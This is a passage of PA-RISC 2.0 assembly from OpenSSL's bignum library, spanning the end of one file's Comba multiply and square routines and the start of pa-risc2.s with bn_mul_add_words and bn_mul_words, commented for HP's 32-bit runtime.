STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z -1,32,33,high_mask ; Create Mask 0xffffffff80000000L
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 32(a_ptr),a4
FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
SQR_ADD_C a0L,a0R,c1,c2,c3
STD c1,0(r_ptr) ; r[0] = c1;
COPY %r0,c1
SQR_ADD_C2 a1L,a1R,a0L,a0R,c2,c3,c1
STD c2,8(r_ptr) ; r[1] = c2;
COPY %r0,c2
SQR_ADD_C a1L,a1R,c3,c1,c2
SQR_ADD_C2 a2L,a2R,a0L,a0R,c3,c1,c2
STD c3,16(r_ptr) ; r[2] = c3;
COPY %r0,c3
SQR_ADD_C2 a3L,a3R,a0L,a0R,c1,c2,c3
SQR_ADD_C2 a2L,a2R,a1L,a1R,c1,c2,c3
STD c1,24(r_ptr) ; r[3] = c1;
COPY %r0,c1
SQR_ADD_C a2L,a2R,c2,c3,c1
SQR_ADD_C2 a3L,a3R,a1L,a1R,c2,c3,c1
STD c2,32(r_ptr) ; r[4] = c2;
COPY %r0,c2
SQR_ADD_C2 a3L,a3R,a2L,a2R,c3,c1,c2
STD c3,40(r_ptr) ; r[5] = c3;
COPY %r0,c3
SQR_ADD_C a3L,a3R,c1,c2,c3
STD c1,48(r_ptr) ; r[6] = c1;
STD c2,56(r_ptr) ; r[7] = c2;
.EXIT
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND
;---------------------------------------------------------------------------
MUL_ADD_C .macro A0L,A0R,B0L,B0R,C1,C2,C3
XMPYU A0L,B0R,ftemp1 ; m1 = bl*ht
FSTD ftemp1,-16(%sp) ;
XMPYU A0R,B0L,ftemp2 ; m = bh*lt
FSTD ftemp2,-8(%sp) ;
XMPYU A0R,B0R,ftemp3 ; lt = bl*lt
FSTD ftemp3,-32(%sp)
XMPYU A0L,B0L,ftemp4 ; ht = bh*ht
FSTD ftemp4,-24(%sp) ;
LDD -8(%sp),m ; r21 = m
LDD -16(%sp),m1 ; r19 = m1
ADD,L m,m1,m ; m+m1
DEPD,Z m,31,32,temp3 ; (m+m1<<32)
LDD -24(%sp),ht ; r24 = ht
CMPCLR,*>>= m,m1,%r0 ; if (m < m1)
ADD,L ht,high_one,ht ; ht+=high_one
EXTRD,U m,31,32,temp1 ; m >> 32
LDD -32(%sp),lt ; lt
ADD,L ht,temp1,ht ; ht+= m>>32
ADD lt,temp3,lt ; lt = lt+m1
ADD,DC ht,%r0,ht ; ht++
ADD C1,lt,C1 ; c1=c1+lt
ADD,DC ht,%r0,ht ; bump c3 if overflow,nullify otherwise
ADD C2,ht,C2 ; c2 = c2 + ht
ADD,DC C3,%r0,C3 ; add in carry (c3++)
.endm
;
;void bn_mul_comba8(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = b_ptr
;
bn_mul_comba8
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_mul_comba8,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
FSTD %fr12,32(%sp) ; save r6
FSTD %fr13,40(%sp) ; save r7
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 32(a_ptr),a4
FLDD 40(a_ptr),a5
FLDD 48(a_ptr),a6
FLDD 56(a_ptr),a7
FLDD 0(b_ptr),b0
FLDD 8(b_ptr),b1
FLDD 16(b_ptr),b2
FLDD 24(b_ptr),b3
FLDD 32(b_ptr),b4
FLDD 40(b_ptr),b5
FLDD 48(b_ptr),b6
FLDD 56(b_ptr),b7
MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
STD c1,0(r_ptr)
COPY %r0,c1
MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
STD c2,8(r_ptr)
COPY %r0,c2
MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
STD c3,16(r_ptr)
COPY %r0,c3
MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
STD c1,24(r_ptr)
COPY %r0,c1
MUL_ADD_C a4L,a4R,b0L,b0R,c2,c3,c1
MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
MUL_ADD_C a0L,a0R,b4L,b4R,c2,c3,c1
STD c2,32(r_ptr)
COPY %r0,c2
MUL_ADD_C a0L,a0R,b5L,b5R,c3,c1,c2
MUL_ADD_C a1L,a1R,b4L,b4R,c3,c1,c2
MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
MUL_ADD_C a4L,a4R,b1L,b1R,c3,c1,c2
MUL_ADD_C a5L,a5R,b0L,b0R,c3,c1,c2
STD c3,40(r_ptr)
COPY %r0,c3
MUL_ADD_C a6L,a6R,b0L,b0R,c1,c2,c3
MUL_ADD_C a5L,a5R,b1L,b1R,c1,c2,c3
MUL_ADD_C a4L,a4R,b2L,b2R,c1,c2,c3
MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
MUL_ADD_C a2L,a2R,b4L,b4R,c1,c2,c3
MUL_ADD_C a1L,a1R,b5L,b5R,c1,c2,c3
MUL_ADD_C a0L,a0R,b6L,b6R,c1,c2,c3
STD c1,48(r_ptr)
COPY %r0,c1
MUL_ADD_C a0L,a0R,b7L,b7R,c2,c3,c1
MUL_ADD_C a1L,a1R,b6L,b6R,c2,c3,c1
MUL_ADD_C a2L,a2R,b5L,b5R,c2,c3,c1
MUL_ADD_C a3L,a3R,b4L,b4R,c2,c3,c1
MUL_ADD_C a4L,a4R,b3L,b3R,c2,c3,c1
MUL_ADD_C a5L,a5R,b2L,b2R,c2,c3,c1
MUL_ADD_C a6L,a6R,b1L,b1R,c2,c3,c1
MUL_ADD_C a7L,a7R,b0L,b0R,c2,c3,c1
STD c2,56(r_ptr)
COPY %r0,c2
MUL_ADD_C a7L,a7R,b1L,b1R,c3,c1,c2
MUL_ADD_C a6L,a6R,b2L,b2R,c3,c1,c2
MUL_ADD_C a5L,a5R,b3L,b3R,c3,c1,c2
MUL_ADD_C a4L,a4R,b4L,b4R,c3,c1,c2
MUL_ADD_C a3L,a3R,b5L,b5R,c3,c1,c2
MUL_ADD_C a2L,a2R,b6L,b6R,c3,c1,c2
MUL_ADD_C a1L,a1R,b7L,b7R,c3,c1,c2
STD c3,64(r_ptr)
COPY %r0,c3
MUL_ADD_C a2L,a2R,b7L,b7R,c1,c2,c3
MUL_ADD_C a3L,a3R,b6L,b6R,c1,c2,c3
MUL_ADD_C a4L,a4R,b5L,b5R,c1,c2,c3
MUL_ADD_C a5L,a5R,b4L,b4R,c1,c2,c3
MUL_ADD_C a6L,a6R,b3L,b3R,c1,c2,c3
MUL_ADD_C a7L,a7R,b2L,b2R,c1,c2,c3
STD c1,72(r_ptr)
COPY %r0,c1
MUL_ADD_C a7L,a7R,b3L,b3R,c2,c3,c1
MUL_ADD_C a6L,a6R,b4L,b4R,c2,c3,c1
MUL_ADD_C a5L,a5R,b5L,b5R,c2,c3,c1
MUL_ADD_C a4L,a4R,b6L,b6R,c2,c3,c1
MUL_ADD_C a3L,a3R,b7L,b7R,c2,c3,c1
STD c2,80(r_ptr)
COPY %r0,c2
MUL_ADD_C a4L,a4R,b7L,b7R,c3,c1,c2
MUL_ADD_C a5L,a5R,b6L,b6R,c3,c1,c2
MUL_ADD_C a6L,a6R,b5L,b5R,c3,c1,c2
MUL_ADD_C a7L,a7R,b4L,b4R,c3,c1,c2
STD c3,88(r_ptr)
COPY %r0,c3
MUL_ADD_C a7L,a7R,b5L,b5R,c1,c2,c3
MUL_ADD_C a6L,a6R,b6L,b6R,c1,c2,c3
MUL_ADD_C a5L,a5R,b7L,b7R,c1,c2,c3
STD c1,96(r_ptr)
COPY %r0,c1
MUL_ADD_C a6L,a6R,b7L,b7R,c2,c3,c1
MUL_ADD_C a7L,a7R,b6L,b6R,c2,c3,c1
STD c2,104(r_ptr)
COPY %r0,c2
MUL_ADD_C a7L,a7R,b7L,b7R,c3,c1,c2
STD c3,112(r_ptr)
STD c1,120(r_ptr)
.EXIT
FLDD -88(%sp),%fr13
FLDD -96(%sp),%fr12
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND
;-----------------------------------------------------------------------------
;
;void bn_mul_comba4(BN_ULONG *r, BN_ULONG *a, BN_ULONG *b)
; arg0 = r_ptr
; arg1 = a_ptr
; arg2 = b_ptr
;
bn_mul_comba4
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_mul_comba4,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
FSTD %fr12,32(%sp) ; save r6
FSTD %fr13,40(%sp) ; save r7
;
; Zero out carries
;
COPY %r0,c1
COPY %r0,c2
COPY %r0,c3
LDO 128(%sp),%sp ; bump stack
DEPDI,Z 1,31,1,high_one ; Create Value 1 << 32
;
; Load up all of the values we are going to use
;
FLDD 0(a_ptr),a0
FLDD 8(a_ptr),a1
FLDD 16(a_ptr),a2
FLDD 24(a_ptr),a3
FLDD 0(b_ptr),b0
FLDD 8(b_ptr),b1
FLDD 16(b_ptr),b2
FLDD 24(b_ptr),b3
MUL_ADD_C a0L,a0R,b0L,b0R,c1,c2,c3
STD c1,0(r_ptr)
COPY %r0,c1
MUL_ADD_C a0L,a0R,b1L,b1R,c2,c3,c1
MUL_ADD_C a1L,a1R,b0L,b0R,c2,c3,c1
STD c2,8(r_ptr)
COPY %r0,c2
MUL_ADD_C a2L,a2R,b0L,b0R,c3,c1,c2
MUL_ADD_C a1L,a1R,b1L,b1R,c3,c1,c2
MUL_ADD_C a0L,a0R,b2L,b2R,c3,c1,c2
STD c3,16(r_ptr)
COPY %r0,c3
MUL_ADD_C a0L,a0R,b3L,b3R,c1,c2,c3
MUL_ADD_C a1L,a1R,b2L,b2R,c1,c2,c3
MUL_ADD_C a2L,a2R,b1L,b1R,c1,c2,c3
MUL_ADD_C a3L,a3R,b0L,b0R,c1,c2,c3
STD c1,24(r_ptr)
COPY %r0,c1
MUL_ADD_C a3L,a3R,b1L,b1R,c2,c3,c1
MUL_ADD_C a2L,a2R,b2L,b2R,c2,c3,c1
MUL_ADD_C a1L,a1R,b3L,b3R,c2,c3,c1
STD c2,32(r_ptr)
COPY %r0,c2
MUL_ADD_C a2L,a2R,b3L,b3R,c3,c1,c2
MUL_ADD_C a3L,a3R,b2L,b2R,c3,c1,c2
STD c3,40(r_ptr)
COPY %r0,c3
MUL_ADD_C a3L,a3R,b3L,b3R,c1,c2,c3
STD c1,48(r_ptr)
STD c2,56(r_ptr)
.EXIT
FLDD -88(%sp),%fr13
FLDD -96(%sp),%fr12
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3
.PROCEND
.SPACE $TEXT$
.SUBSPA $CODE$
.SPACE $PRIVATE$,SORT=16
.IMPORT $global$,DATA
.SPACE $TEXT$
.SUBSPA $CODE$
.SUBSPA $LIT$,ACCESS=0x2c
C$4
.ALIGN 8
.STRINGZ "Division would overflow (%d)\n"
.END
|
AIFM-sys/AIFM
| 48,599
|
shenango/apps/parsec/pkgs/libs/ssl/src/crypto/bn/asm/pa-risc2.s
|
;
; PA-RISC 2.0 implementation of bn_asm code, based on the
; 64-bit version of the code. This code is effectively the
; same as the 64-bit version except the register model is
; slightly different given all values must be 32-bit between
; function calls. Thus the 64-bit return values are returned
; in %ret0 and %ret1 vs just %ret0 as is done in 64-bit
;
;
; This code is approximately 2x faster than the C version
; for RSA/DSA.
;
; See http://devresource.hp.com/ for more details on the PA-RISC
; architecture. Also see the book "PA-RISC 2.0 Architecture"
; by Gerry Kane for information on the instruction set architecture.
;
; Code written by Chris Ruemmler (with some help from the HP C
; compiler).
;
; The code compiles with HP's assembler
;
.level 2.0N
.space $TEXT$
.subspa $CODE$,QUAD=0,ALIGN=8,ACCESS=0x2c,CODE_ONLY
;
; Global Register definitions used for the routines.
;
; Some information about HP's runtime architecture for 32-bits.
;
; "Caller save" means the calling function must save the register
; if it wants the register to be preserved.
; "Callee save" means if a function uses the register, it must save
; the value before using it.
;
; For the floating point registers
;
; "caller save" registers: fr4-fr11, fr22-fr31
; "callee save" registers: fr12-fr21
; "special" registers: fr0-fr3 (status and exception registers)
;
; For the integer registers
; value zero : r0
; "caller save" registers: r1,r19-r26
; "callee save" registers: r3-r18
; return register : r2 (rp)
; return values ; r28,r29 (ret0,ret1)
; Stack pointer ; r30 (sp)
; millicode return ptr ; r31 (also a caller save register)
;
; Arguments to the routines
;
r_ptr .reg %r26
a_ptr .reg %r25
b_ptr .reg %r24
num .reg %r24
n .reg %r23
;
; Note that the "w" argument for bn_mul_add_words and bn_mul_words
; is passed on the stack at a delta of -56 from the top of stack
; as the routine is entered.
;
;
; Globals used in some routines
;
top_overflow .reg %r23
high_mask .reg %r22 ; value 0xffffffff80000000L
;------------------------------------------------------------------------------
;
; bn_mul_add_words
;
;BN_ULONG bn_mul_add_words(BN_ULONG *r_ptr, BN_ULONG *a_ptr,
; int num, BN_ULONG w)
;
; arg0 = r_ptr
; arg1 = a_ptr
; arg3 = num
; -56(sp) = w
;
; Local register definitions
;
fm1 .reg %fr22
fm .reg %fr23
ht_temp .reg %fr24
ht_temp_1 .reg %fr25
lt_temp .reg %fr26
lt_temp_1 .reg %fr27
fm1_1 .reg %fr28
fm_1 .reg %fr29
fw_h .reg %fr7L
fw_l .reg %fr7R
fw .reg %fr7
fht_0 .reg %fr8L
flt_0 .reg %fr8R
t_float_0 .reg %fr8
fht_1 .reg %fr9L
flt_1 .reg %fr9R
t_float_1 .reg %fr9
tmp_0 .reg %r31
tmp_1 .reg %r21
m_0 .reg %r20
m_1 .reg %r19
ht_0 .reg %r1
ht_1 .reg %r3
lt_0 .reg %r4
lt_1 .reg %r5
m1_0 .reg %r6
m1_1 .reg %r7
rp_val .reg %r8
rp_val_1 .reg %r9
bn_mul_add_words
.export bn_mul_add_words,entry,NO_RELOCATION,LONG_RETURN
.proc
.callinfo frame=128
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
NOP ; Needed to make the loop 16-byte aligned
NOP ; needed to make the loop 16-byte aligned
STD %r5,16(%sp) ; save r5
NOP
STD %r6,24(%sp) ; save r6
STD %r7,32(%sp) ; save r7
STD %r8,40(%sp) ; save r8
STD %r9,48(%sp) ; save r9
COPY %r0,%ret1 ; return 0 by default
DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32
CMPIB,>= 0,num,bn_mul_add_words_exit ; if (num <= 0) then exit
LDO 128(%sp),%sp ; bump stack
;
; The loop is unrolled twice, so if there is only 1 number
; then go straight to the cleanup code.
;
CMPIB,= 1,num,bn_mul_add_words_single_top
FLDD -184(%sp),fw ; (-56-128) load up w into fw (fw_h/fw_l)
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
; two 32-bit mutiplies can be issued per cycle.
;
bn_mul_add_words_unroll2
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
FLDD 8(a_ptr),t_float_1 ; load up 64-bit value (fr8L) ht(L)/lt(R)
LDD 0(r_ptr),rp_val ; rp[0]
LDD 8(r_ptr),rp_val_1 ; rp[1]
XMPYU fht_0,fw_l,fm1 ; m1[0] = fht_0*fw_l
XMPYU fht_1,fw_l,fm1_1 ; m1[1] = fht_1*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1[0]
FSTD fm1_1,-48(%sp) ; -48(sp) = m1[1]
XMPYU flt_0,fw_h,fm ; m[0] = flt_0*fw_h
XMPYU flt_1,fw_h,fm_1 ; m[1] = flt_1*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m[0]
FSTD fm_1,-40(%sp) ; -40(sp) = m[1]
XMPYU fht_0,fw_h,ht_temp ; ht_temp = fht_0*fw_h
XMPYU fht_1,fw_h,ht_temp_1 ; ht_temp_1 = fht_1*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht_temp
FSTD ht_temp_1,-56(%sp) ; -56(sp) = ht_temp_1
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
XMPYU flt_1,fw_l,lt_temp_1 ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt_temp
FSTD lt_temp_1,-64(%sp) ; -64(sp) = lt_temp_1
LDD -8(%sp),m_0 ; m[0]
LDD -40(%sp),m_1 ; m[1]
LDD -16(%sp),m1_0 ; m1[0]
LDD -48(%sp),m1_1 ; m1[1]
LDD -24(%sp),ht_0 ; ht[0]
LDD -56(%sp),ht_1 ; ht[1]
ADD,L m1_0,m_0,tmp_0 ; tmp_0 = m[0] + m1[0];
ADD,L m1_1,m_1,tmp_1 ; tmp_1 = m[1] + m1[1];
LDD -32(%sp),lt_0
LDD -64(%sp),lt_1
CMPCLR,*>>= tmp_0,m1_0, %r0 ; if (m[0] < m1[0])
ADD,L ht_0,top_overflow,ht_0 ; ht[0] += (1<<32)
CMPCLR,*>>= tmp_1,m1_1,%r0 ; if (m[1] < m1[1])
ADD,L ht_1,top_overflow,ht_1 ; ht[1] += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m[0]>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1[0] = m[0]<<32
EXTRD,U tmp_1,31,32,m_1 ; m[1]>>32
DEPD,Z tmp_1,31,32,m1_1 ; m1[1] = m[1]<<32
ADD,L ht_0,m_0,ht_0 ; ht[0]+= (m[0]>>32)
ADD,L ht_1,m_1,ht_1 ; ht[1]+= (m[1]>>32)
ADD lt_0,m1_0,lt_0 ; lt[0] = lt[0]+m1[0];
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
ADD lt_1,m1_1,lt_1 ; lt[1] = lt[1]+m1[1];
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
ADD %ret1,lt_0,lt_0 ; lt[0] = lt[0] + c;
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
ADD lt_0,rp_val,lt_0 ; lt[0] = lt[0]+rp[0]
ADD,DC ht_0,%r0,ht_0 ; ht[0]++
LDO -2(num),num ; num = num - 2;
ADD ht_0,lt_1,lt_1 ; lt[1] = lt[1] + ht_0 (c);
ADD,DC ht_1,%r0,ht_1 ; ht[1]++
STD lt_0,0(r_ptr) ; rp[0] = lt[0]
ADD lt_1,rp_val_1,lt_1 ; lt[1] = lt[1]+rp[1]
ADD,DC ht_1,%r0,%ret1 ; ht[1]++
LDO 16(a_ptr),a_ptr ; a_ptr += 2
STD lt_1,8(r_ptr) ; rp[1] = lt[1]
CMPIB,<= 2,num,bn_mul_add_words_unroll2 ; go again if more to do
LDO 16(r_ptr),r_ptr ; r_ptr += 2
CMPIB,=,N 0,num,bn_mul_add_words_exit ; are we done, or cleanup last one
;
; Top of loop aligned on 64-byte boundary
;
bn_mul_add_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
LDD 0(r_ptr),rp_val ; rp[0]
LDO 8(a_ptr),a_ptr ; a_ptr++
XMPYU fht_0,fw_l,fm1 ; m1 = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
LDD -8(%sp),m_0
LDD -16(%sp),m1_0 ; m1 = temp1
ADD,L m_0,m1_0,tmp_0 ; tmp_0 = m + m1;
LDD -24(%sp),ht_0
LDD -32(%sp),lt_0
CMPCLR,*>>= tmp_0,m1_0,%r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD lt_0,m1_0,tmp_0 ; tmp_0 = lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD %ret1,tmp_0,lt_0 ; lt = lt + c;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD lt_0,rp_val,lt_0 ; lt = lt+rp[0]
ADD,DC ht_0,%r0,%ret1 ; ht++
STD lt_0,0(r_ptr) ; rp[0] = lt
bn_mul_add_words_exit
.EXIT
EXTRD,U %ret1,31,32,%ret0 ; for 32-bit, return in ret0/ret1
LDD -80(%sp),%r9 ; restore r9
LDD -88(%sp),%r8 ; restore r8
LDD -96(%sp),%r7 ; restore r7
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3
.PROCEND ;in=23,24,25,26,29;out=28;
;----------------------------------------------------------------------------
;
;BN_ULONG bn_mul_words(BN_ULONG *rp, BN_ULONG *ap, int num, BN_ULONG w)
;
; arg0 = rp
; arg1 = ap
; arg3 = num
; w on stack at -56(sp)
bn_mul_words
.proc
.callinfo frame=128
.entry
.EXPORT bn_mul_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
NOP
STD %r5,16(%sp) ; save r5
STD %r6,24(%sp) ; save r6
STD %r7,32(%sp) ; save r7
COPY %r0,%ret1 ; return 0 by default
DEPDI,Z 1,31,1,top_overflow ; top_overflow = 1 << 32
CMPIB,>= 0,num,bn_mul_words_exit
LDO 128(%sp),%sp ; bump stack
;
; See if only 1 word to do, thus just do cleanup
;
CMPIB,= 1,num,bn_mul_words_single_top
FLDD -184(%sp),fw ; (-56-128) load up w into fw (fw_h/fw_l)
;
; This loop is unrolled 2 times (64-byte aligned as well)
;
; PA-RISC 2.0 chips have two fully pipelined multipliers, thus
; two 32-bit mutiplies can be issued per cycle.
;
bn_mul_words_unroll2
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
FLDD 8(a_ptr),t_float_1 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,fw_l,fm1 ; m1[0] = fht_0*fw_l
XMPYU fht_1,fw_l,fm1_1 ; m1[1] = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
FSTD fm1_1,-48(%sp) ; -48(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
XMPYU flt_1,fw_h,fm_1 ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
FSTD fm_1,-40(%sp) ; -40(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = fht_0*fw_h
XMPYU fht_1,fw_h,ht_temp_1 ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
FSTD ht_temp_1,-56(%sp) ; -56(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
XMPYU flt_1,fw_l,lt_temp_1 ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
FSTD lt_temp_1,-64(%sp) ; -64(sp) = lt
LDD -8(%sp),m_0
LDD -40(%sp),m_1
LDD -16(%sp),m1_0
LDD -48(%sp),m1_1
LDD -24(%sp),ht_0
LDD -56(%sp),ht_1
ADD,L m1_0,m_0,tmp_0 ; tmp_0 = m + m1;
ADD,L m1_1,m_1,tmp_1 ; tmp_1 = m + m1;
LDD -32(%sp),lt_0
LDD -64(%sp),lt_1
CMPCLR,*>>= tmp_0,m1_0, %r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
CMPCLR,*>>= tmp_1,m1_1,%r0 ; if (m < m1)
ADD,L ht_1,top_overflow,ht_1 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
EXTRD,U tmp_1,31,32,m_1 ; m>>32
DEPD,Z tmp_1,31,32,m1_1 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD,L ht_1,m_1,ht_1 ; ht+= (m>>32)
ADD lt_0,m1_0,lt_0 ; lt = lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD lt_1,m1_1,lt_1 ; lt = lt+m1;
ADD,DC ht_1,%r0,ht_1 ; ht++
ADD %ret1,lt_0,lt_0 ; lt = lt + c (ret1);
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD ht_0,lt_1,lt_1 ; lt = lt + c (ht_0)
ADD,DC ht_1,%r0,ht_1 ; ht++
STD lt_0,0(r_ptr) ; rp[0] = lt
STD lt_1,8(r_ptr) ; rp[1] = lt
COPY ht_1,%ret1 ; carry = ht
LDO -2(num),num ; num = num - 2;
LDO 16(a_ptr),a_ptr ; ap += 2
CMPIB,<= 2,num,bn_mul_words_unroll2
LDO 16(r_ptr),r_ptr ; rp++
CMPIB,=,N 0,num,bn_mul_words_exit ; are we done?
;
; Top of loop aligned on 64-byte boundary
;
bn_mul_words_single_top
FLDD 0(a_ptr),t_float_0 ; load up 64-bit value (fr8L) ht(L)/lt(R)
XMPYU fht_0,fw_l,fm1 ; m1 = ht*fw_l
FSTD fm1,-16(%sp) ; -16(sp) = m1
XMPYU flt_0,fw_h,fm ; m = lt*fw_h
FSTD fm,-8(%sp) ; -8(sp) = m
XMPYU fht_0,fw_h,ht_temp ; ht_temp = ht*fw_h
FSTD ht_temp,-24(%sp) ; -24(sp) = ht
XMPYU flt_0,fw_l,lt_temp ; lt_temp = lt*fw_l
FSTD lt_temp,-32(%sp) ; -32(sp) = lt
LDD -8(%sp),m_0
LDD -16(%sp),m1_0
ADD,L m_0,m1_0,tmp_0 ; tmp_0 = m + m1;
LDD -24(%sp),ht_0
LDD -32(%sp),lt_0
CMPCLR,*>>= tmp_0,m1_0,%r0 ; if (m < m1)
ADD,L ht_0,top_overflow,ht_0 ; ht += (1<<32)
EXTRD,U tmp_0,31,32,m_0 ; m>>32
DEPD,Z tmp_0,31,32,m1_0 ; m1 = m<<32
ADD,L ht_0,m_0,ht_0 ; ht+= (m>>32)
ADD lt_0,m1_0,lt_0 ; lt= lt+m1;
ADD,DC ht_0,%r0,ht_0 ; ht++
ADD %ret1,lt_0,lt_0 ; lt = lt + c;
ADD,DC ht_0,%r0,ht_0 ; ht++
COPY ht_0,%ret1 ; copy carry
STD lt_0,0(r_ptr) ; rp[0] = lt
bn_mul_words_exit
.EXIT
EXTRD,U %ret1,31,32,%ret0 ; for 32-bit, return in ret0/ret1
LDD -96(%sp),%r7 ; restore r7
LDD -104(%sp),%r6 ; restore r6
LDD -112(%sp),%r5 ; restore r5
LDD -120(%sp),%r4 ; restore r4
BVE (%rp)
LDD,MB -128(%sp),%r3 ; restore r3
.PROCEND
;----------------------------------------------------------------------------
;
;void bn_sqr_words(BN_ULONG *rp, BN_ULONG *ap, int num)
;
; arg0 = rp
; arg1 = ap
; arg2 = num
;
bn_sqr_words
.proc
.callinfo FRAME=128,ENTRY_GR=%r3,ARGS_SAVED,ORDERING_AWARE
.EXPORT bn_sqr_words,ENTRY,PRIV_LEV=3,NO_RELOCATION,LONG_RETURN
.entry
.align 64
STD %r3,0(%sp) ; save r3
STD %r4,8(%sp) ; save r4
NOP
STD %r5,16(%sp) ; save r5
CMPIB,>= 0,num,bn_sqr_words_exit
LDO 128(%sp),%sp ; bump stack
;
; If only 1, the goto straight to cleanup
;
CMPIB,= 1,num,bn_sqr_words_single_top
